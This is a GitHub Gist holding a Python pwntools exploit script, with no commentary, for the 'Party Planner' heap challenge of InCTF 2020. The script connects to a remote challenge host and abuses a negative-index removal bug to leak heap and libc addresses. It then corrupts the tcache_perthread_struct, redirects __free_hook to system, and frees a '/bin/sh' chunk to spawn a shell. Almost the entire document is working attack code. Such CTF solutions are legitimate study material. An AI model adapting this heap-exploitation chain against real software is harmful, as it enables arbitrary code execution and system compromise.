Created
August 1, 2020 16:16
-
-
Save KaoRz/f0871af7c280deb72cec2fa2e69be3f5 to your computer and use it in GitHub Desktop.
Party Planner - InCTF 2020
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| from pwn import * | |
| context.terminal = ['tmux', 'sp', '-h'] | |
| #context.log_level = 'DEBUG' | |
| elf = ELF("./chall") | |
| LOCAL = False | |
| def create_house(name, size, description): | |
| io.recvuntil("Choice >> ") | |
| io.sendline("1") | |
| io.recvuntil("House : ") | |
| io.sendline(name) | |
| io.recvuntil("House : ") | |
| io.sendline(str(size)) | |
| io.recvuntil("description : ") | |
| io.sendline(description) | |
| def create_person(name, size, details): | |
| io.recvuntil("Choice >> ") | |
| io.sendline("2") | |
| io.recvuntil("Person : ") | |
| io.sendline(name) | |
| io.recvuntil("Person : ") | |
| io.sendline(str(size)) | |
| io.recvuntil("details : ") | |
| io.sendline(details) | |
| def add_person(number, house): | |
| io.recvuntil("Choice >> ") | |
| io.sendline("3") | |
| io.recvuntil("number : ") | |
| io.sendline(str(number)) | |
| io.recvuntil("? : ") | |
| io.sendline(str(house)) | |
| def remove_person(number, house): | |
| io.recvuntil("Choice >> ") | |
| io.sendline("4") | |
| io.recvuntil("? : ") | |
| io.sendline(str(house)) | |
| io.recvuntil("number : ") | |
| io.sendline(str(number)) | |
| def show_house(house): | |
| io.recvuntil("Choice >> ") | |
| io.sendline("5") | |
| io.recvuntil("? : ") | |
| io.sendline(str(house)) | |
| def show_person(number, house): | |
| io.recvuntil("Choice >> ") | |
| io.sendline("6") | |
| io.recvuntil("? : ") | |
| io.sendline(str(house)) | |
| io.recvuntil("number : ") | |
| io.sendline(str(number)) | |
| def party(house): | |
| io.recvuntil("Choice >> ") | |
| io.sendline("7") | |
| io.recvuntil("? : ") | |
| io.sendline(str(house)) | |
| def destroy_house(house): | |
| io.recvuntil("Choice >> ") | |
| io.sendline("8") | |
| io.recvuntil("? : ") | |
| io.sendline(str(house)) | |
| if LOCAL == True: | |
| libc = ELF("/lib/x86_64-linux-gnu/libc.so.6", checksec = False) | |
| io = process(elf.path) | |
| else: | |
| libc = ELF("./libc.so.6", checksec = False) | |
| io = remote("35.245.143.0", 5555) | |
| create_house("", 0x10, "") | |
| create_house("", 0x10, "") | |
| create_person("", 0x100, "") | |
| add_person(0, 0) | |
| show_person(0, 0) | |
| remove_person(-4294967294, 0) | |
| create_person("", 0x100, "") | |
| add_person(0, 1) | |
| for _ in range(8): | |
| create_person("", 0x100, "") | |
| add_person(0, 0) | |
| for i in range(1, 9): | |
| remove_person(i, 0) | |
| remove_person(0, 0) | |
| show_house(1) | |
| io.recvuntil("Person 0 ") | |
| heap_leak = u64(io.recvuntil(" with", drop = True).ljust(8, b"\x00")) | |
| tpt_struct = heap_leak - 0xd80 | |
| io.recvuntil(" details ") | |
| leak = u64(io.recvuntil("\n ", drop = True).ljust(8, b"\x00")) | |
| libc.address = leak - 0x1e4ca0 | |
| log.success("Leaked heap address: " + hex(heap_leak)) | |
| log.info("Heap tcache_perthread_struct address: " + hex(tpt_struct)) | |
| log.success("Leaked GLIBC arena address: " + hex(leak)) | |
| log.info("GLIBC base address: " + hex(libc.address)) | |
| create_person("", 0x30, "") | |
| add_person(0, 0) | |
| create_person("", 0x50, "") | |
| add_person(0, 0) | |
| show_person(0, 0) | |
| remove_person(-4294967294, 0) | |
| remove_person(1, 0) | |
| create_person("", 0x30, b"\x00" * 0x20 + p64(tpt_struct) + p64(0x1) + p8(0x1)) | |
| add_person(0, 1) | |
| remove_person(0, 0) | |
| create_person("", 0x240, b"\x00" * 0x60 + p64(libc.sym["__free_hook"] - 0x10)) | |
| create_person("", 0x50, b"/bin/sh".ljust(0x10, b"\x00") + p64(libc.sym["system"])) | |
| add_person(1, 0) | |
| remove_person(0, 0) | |
| io.interactive() | |
| io.close() | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment